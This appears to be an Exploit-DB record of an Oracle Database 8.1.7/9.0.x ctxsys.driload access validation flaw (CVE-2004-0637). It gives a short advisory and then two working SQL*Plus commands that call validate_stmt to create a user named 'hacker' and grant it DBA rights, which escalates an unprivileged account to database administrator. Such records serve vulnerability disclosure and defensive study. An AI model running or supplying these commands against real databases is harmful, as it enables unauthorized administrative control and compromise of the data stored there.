Oracle Database Server 8.1.7/9.0.x ctxsys.driload Access Validation Vulnerability

2004-09-03T00:00:00
ID EDB-ID:24567
Type exploitdb
Reporter Alexander Kornbrust
Modified 2004-09-03T00:00:00

Description

Oracle Database Server 8.1.7/9.0.x ctxsys.driload Access Validation Vulnerability. CVE-2004-0637 . Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/11099/info

Oracle Database Server is prone to an access validation vulnerability that may permit unprivileged users to execute commands as the DBA. This could compromise the database.

SQL> exec ctxsys.driload.validate_stmt
('create user hacker identified by hacker');
SQL> exec ctxsys.driload.validate_stmt('grant dba, connect to hacker');